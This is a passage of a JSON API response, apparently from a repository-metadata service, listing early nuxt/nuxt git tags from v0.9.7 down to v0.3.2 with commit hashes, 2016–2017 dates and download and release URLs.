rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2